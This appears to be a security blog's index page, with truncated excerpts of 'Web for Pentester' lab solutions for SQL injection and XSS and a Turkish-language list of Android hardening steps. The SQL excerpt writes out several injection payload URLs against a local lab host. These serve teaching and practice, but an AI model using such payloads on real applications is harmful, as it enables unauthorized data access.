Web for Pentester -1 SQL Solutions

Example -1 Quote! If we inject a single quote, using ?name=root', the table disappears. We probably broke something... http://172.16.138.193/sqli/example1.php?name=root'%20or%20'1'='1 Example -2 ERROR SPACE http://172.16.138.193/sqli/example2.php?name=root'or'1'='1 Example -3 Comments! http://172.16.138.193/sqli/example3.php?name=root'//or//'1'='1 Example -4 Dot! I add “.” at the beginning of the URL. Also, you can add “.” or “-” ...etc. http://172.16.138.193/sqli/example4.php?id=.2 or 1=1 Example – 5&6 Error … Continue reading Web for Pentester -1 SQL Solutions

Mobil Cihazlar İçin Güvenlik Adımları

Android Cihazlar İçin Güvenlik Adımları Disk şifrelemeyi aktif edin. 4 karakterli PIN kodu yerine biyometrik şifreleri cihaz kilidi için kullanın. Geliştirici erişimini devre dışı bırakın (Varsayılan olarak kapalı konumunda). 3. Taraflı uygulama mağazaları erişimini devre dışı bırakın (genellikle kapalı konumunda varsayılan) Uygulamalar ve araçlar kullanılarak geniş Android Permission’lar sağlayan uygulamaları silin. Güncelleme geldiği zaman Android … Continue reading Mobil Cihazlar İçin Güvenlik Adımları

Web for Pentester-1 XSS Solutions

XSS (Cross-site Scripting) Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that … Continue reading Web for Pentester-1 XSS Solutions